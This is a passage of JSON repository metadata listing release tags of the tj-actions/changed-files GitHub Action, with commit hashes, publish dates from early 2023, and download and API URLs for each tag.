nged-files/tags/v36.0.0/manifests"},{"name":"v35.9.2-sec","sha":"4fc4e9d28ecb58e0215483343f3dd2fd01178f42","kind":"tag","published_at":"2023-05-01T09:01:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.9.2-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.9.2-sec","dependencies_parsed_at":"2023-11-09T04:04:26.282Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.9.2-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.2-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.2-sec/manifests"},{"name":"v35.9.2","sha":"b2d17f51244a144849c6b37a3a6791b98a51d86f","kind":"commit","published_at":"2023-04-28T17:01:53.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.9.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.9.2","dependencies_parsed_at":"2023-11-09T04:04:48.601Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.2/manifests"},{"name":"v35.9.1-sec","sha":"89daa3bca3cd1f2967097668c0e8b5f7dda4d57f","kind":"tag","published_at":"2023-04-28T06:38:56.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.9.1-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.9.1-sec","dependencies_parsed_at":"2023-11-09T04:04:27.594Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.9.1-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.1-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.1-sec/manifests"},{"name":"v35.9.1","sha":"4a0aac0d19aa2838c6741fdf95a5276390418dc2","kind":"commit","published_at":"2023-04-28T06:35:16.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.9.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.9.1","dependencies_parsed_at":"2023-11-09T04:04:28.083Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.1/manifests"},{"name":"v35.9.0-sec","sha":"2e61fb6a48f5857e3a338b4cbf071e1164c060e9","kind":"tag","published_at":"2023-04-21T18:02:55.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.9.0-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.9.0-sec","dependencies_parsed_at":"2023-11-09T04:04:25.928Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.9.0-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.0-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.0-sec/manifests"},{"name":"v35.9.0","sha":"ce810b29b28abf274afebdcd8fe47b8fba0f28bd","kind":"commit","published_at":"2023-04-21T17:56:52.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.9.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.9.0","dependencies_parsed_at":"2023-11-09T04:04:29.165Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.0/manifests"},{"name":"v35.8.0-sec","sha":"21d7a75834ad73fed7fa33b39b73ebe6495ee4e1","kind":"tag","published_at":"2023-04-12T10:05:10.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.8.0-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.8.0-sec","dependencies_parsed_at":"2023-11-09T04:04:32.825Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.8.0-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.8.0-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.8.0-sec/manifests"},{"name":"v35.8.0","sha":"7ecfc6730dff8072d1cc5215a24cc9478f55264d","kind":"commit","published_at":"2023-04-12T10:02:29.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.8.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.8.0","dependencies_parsed_at":"2023-11-09T04:04:25.747Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.8.0/manifests"},{"name":"v35.7.12-sec","sha":"2be7c3758f3e6e45ae5d27c133a3260c5b0fdd60","kind":"tag","published_at":"2023-04-07T03:00:42.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.12-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.12-sec","dependencies_parsed_at":"2023-11-09T04:04:23.540Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.12-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.12-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.12-sec/manifests"},{"name":"v35.7.12","sha":"b109d83a62e94cf7c522bf6c15cb25c175850b16","kind":"commit","published_at":"2023-04-07T02:56:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.12","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.12","dependencies_parsed_at":"2023-11-09T04:04:28.645Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.12/manifests"},{"name":"v35.7.11-sec","sha":"123dfd48407ae53e33a73e2ae9adf9d8ad8b14d6","kind":"tag","published_at":"2023-04-04T20:14:51.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.11-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.11-sec","dependencies_parsed_at":"2023-11-09T04:04:27.576Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.11-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.11-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.11-sec/manifests"},{"name":"v35.7.11","sha":"79adacd43ea069e57037edc891ea8d33013bc3da","kind":"commit","published_at":"2023-04-04T19:58:30.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.11","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.11","dependencies_parsed_at":"2023-11-09T04:04:47.893Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.11/manifests"},{"name":"v35.7.10-sec","sha":"61bf27253df806648581aaddd4a8ec394b968c80","kind":"tag","published_at":"2023-04-04T19:11:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.10-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.10-sec","dependencies_parsed_at":"2023-11-09T04:04:26.283Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.10-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.10-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.10-sec/manifests"},{"name":"v35.7.10","sha":"6e426e6495fa7ea3451f37ce3f1dac2a3f16f62c","kind":"commit","published_at":"2023-04-04T19:07:27.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.10","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.10","dependencies_parsed_at":"2023-11-09T04:04:24.686Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.10/manifests"},{"name":"v35.7.9-sec","sha":"b94d96993dacb3158c51d22c3afae1f4059a71d2","kind":"tag","published_at":"2023-04-04T18:46:15.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.9-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.9-sec","dependencies_parsed_at":"2023-11-09T04:04:48.789Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.9-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.9-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.9-sec/manifests"},{"name":"v35.7.9","sha":"5e2d64b30d51d557c5a29309ecbd5481a236ec77","kind":"commit","published_at":"2023-04-04T18:08:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.9","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.9","dependencies_parsed_at":"2023-11-09T04:04:48.425Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.9/manifests"},{"name":"v35.7.8-sec","sha":"22bed7e94fbb176468579214290dfd84abc6ea86","kind":"tag","published_at":"2023-03-28T17:01:41.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.8-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.8-sec","dependencies_parsed_at":"2023-11-09T04:04:28.151Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.8-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.8-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.8-sec/manifests"},{"name":"v35.7.8","sha":"e9b5807e928fc8eea705c90da5524fd44b183ba1","kind":"commit","published_at":"2023-03-28T10:27:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.8","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.8","dependencies_parsed_at":"2023-11-09T04:04:26.169Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.8/manifests"},{"name":"v35.7.7-sec","sha":"7795905b24e743c8c33cd5ba5cd256cc92c81f68","kind":"tag","published_at":"2023-03-28T06:33:40.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.7-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.7-sec","dependencies_parsed_at":"2023-11-09T04:04:48.330Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.7-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.7-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.7-sec/manifests"},{"name":"v35.7.7","sha":"db5dd7c176cf59a19ef6561bf1936f059dee4b74","kind":"commit","published_at":"2023-03-28T05:56:06.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.7","dependencies_parsed_at":"2023-11-09T04:04:22.093Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.7/manifests"},{"name":"v35.7.6-sec","sha":"08d9eb809753cbbaf6c8256285605312ce3987b9","kind":"tag","published_at":"2023-03-22T20:57:04.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.6-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.6-sec","dependencies_parsed_at":"2023-11-09T04:04:24.216Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.6-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.6-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.6-sec/manifests"},{"name":"v35.7.6","sha":"07f86bcdc42639264ec561c7f175fea5f532b6ce","kind":"commit","published_at":"2023-03-22T20:47:57.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.6","dependencies_parsed_at":"2023-11-09T04:04:23.568Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.6/manifests"},{"name":"v35.7.5","sha":"3a3ec498d8976e74f5dd829c413c1d446e738df7","kind":"commit","published_at":"2023-03-22T20:38:48.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.5","dependencies_parsed_at":"2023-11-09T04:04:21.521Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.5/manifests"},{"name":"v35.7.4","sha":"ee137444f0b3b0855cb2fc7df807416ba2c3d311","kind":"commit","published_at":"2023-03-22T20:30:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.4","dependencies_parsed_at":"2023-11-09T04:04:27.592Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.4/manifests"},{"name":"v35.7.3","sha":"cda290230383045a8887a250c2abf796bf1dc6da","kind":"commit","published_at":"2023-03-22T20:26:24.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.3","dependencies_parsed_at":"2023-11-09T04:04:49.464Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.3/manifests"},{"name":"v35.7.2","sha":"9328bab880abf4acc377d77718d28c6ac167f154","kind":"commit","published_at":"2023-03-17T05:01:40.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.2","dependencies_parsed_at":"2023-11-09T04:04:25.057Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.2/manifests"},{"name":"v35.7.1-sec","sha":"7e64030c44ffb4a2e8199e7e105943eb108db836","kind":"commit","published_at":"2023-03-14T19:54:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.1-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.1-sec","dependencies_parsed_at":"2023-11-09T04:04:49.509Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.1-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.1-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.1-sec/manifests"},{"name":"v35-sec","sha":"7e64030c44ffb4a2e8199e7e105943eb108db836","kind":"commit","published_at":"2023-03-14T19:54:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35-sec","dependencies_parsed_at":"2023-11-09T04:04:48.762Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35-sec/manifests"},{"name":"v35.7.1","sha":"4e680e146a8e1b530a912f0a1fdc2f0ace7d1bb7","kind":"commit","published_at":"2023-03-14T17:19:11.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.1","dependencies_parsed_at":"2023-11-09T04:04:21.562Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.1/manifests"},{"name":"v35.7.0-sec","sha":"1d1543af8cef13eb42c756e9425e2cc50e8030b0","kind":"commit","published_at":"2023-03-13T19:23:00.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.0-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.0-sec","dependencies_parsed_at":"2023-11-09T04:04:22.145Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.0-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.0-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.0-sec/manifests"},{"name":"v35.7.0","sha":"bd376fbcfae914347656e4c70801e2a3fafed05b","kind":"commit","published_at":"2023-03-13T17:20:20.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.7.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.7.0","dependencies_parsed_at":"2023-11-09T04:04:24.042Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.7.0/manifests"},{"name":"v35.6.4","sha":"84ed30e2f4daf616144de7e0c1db59d5b33025e3","kind":"commit","published_at":"2023-03-10T04:01:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.6.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.6.4","dependencies_parsed_at":"2023-11-09T04:04:33.019Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.4/manifests"},{"name":"v35.6.3","sha":"74b06cafc9658d2a91cc5ceb920fd6b5a5649051","kind":"commit","published_at":"2023-03-09T03:52:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.6.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.6.3","dependencies_parsed_at":"2023-11-09T04:04:44.308Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.3/manifests"},{"name":"v35.6.2","sha":"5ce975c6021a0b11062c547acb6c26c96a34a8c5","kind":"commit","published_at":"2023-03-09T03:02:52.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.6.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.6.2","dependencies_parsed_at":"2023-11-09T04:04:50.110Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.2/manifests"},{"name":"v35.6.1","sha":"04124efe7560d15e11ea2ba96c0df2989f68f1f4","kind":"commit","published_at":"2023-02-28T19:47:37.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.6.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.6.1","dependencies_parsed_at":"2023-11-09T04:04:22.949Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.1/manifests"},{"name":"v35.6.0","sha":"3ee6abf6107ccc2d8ee538de7ff6b1fb644f5d60","kind":"commit","published_at":"2023-02-26T15:20:02.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.6.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.6.0","dependencies_parsed_at":"2023-11-09T04:04:33.280Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.6.0/manifests"},{"name":"v35.5.6","sha":"23e3c4300cb904a9d9c36fc2df4111a2fa9b9ff1","kind":"commit","published_at":"2023-02-20T18:39:52.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.5.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.5.6","dependencies_parsed_at":"2023-11-09T04:04:21.868Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.6/manifests"},{"name":"v35.5.5","sha":"5a331a4999f9f21a3ef2a6459edee90393a8b92a","kind":"commit","published_at":"2023-02-16T13:33:33.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.5.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.5.5","dependencies_parsed_at":"2023-11-09T04:04:22.054Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.5/manifests"},{"name":"v35.5.4","sha":"74338865c1e73fee674ce5cfc5d28f4b9caa33bc","kind":"commit","published_at":"2023-02-16T04:48:41.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.5.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.5.4","dependencies_parsed_at":"2023-11-09T04:04:22.921Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.4/manifests"},{"name":"v35.5.3","sha":"d5414fd30b0b7618c815fe7ebe5673720e081937","kind":"commit","published_at":"2023-02-14T04:26:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.5.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.5.3","dependencies_parsed_at":"2023-11-09T04:04:26.069Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.3/manifests"},{"name":"v35.5.2","sha":"7f2aa19bdcf4a00195671e368091a1e32a694ac5","kind":"commit","published_at":"2023-02-09T14:33:33.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.5.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.5.2","dependencies_parsed_at":"2023-11-09T04:04:21.910Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.2/manifests"},{"name":"v35.5.1","sha":"210cc839c24f532fe4fbf510b7b3314ca9a2b90b","kind":"commit","published_at":"2023-02-07T01:25:06.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.5.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.5.1","dependencies_parsed_at":"2023-11-09T04:04:24.293Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.5.1/manifests"},{"name":"v35.5.0","sha":"db3ea27a0cf07135175be5efe7aaf84df6e0e6f0","kind":"commit","published_at":"2023-02-01T01:53:59.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.5.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.5.0","dependencies_parsed_at":"2023-11-09T04:04:26.093Z","dependen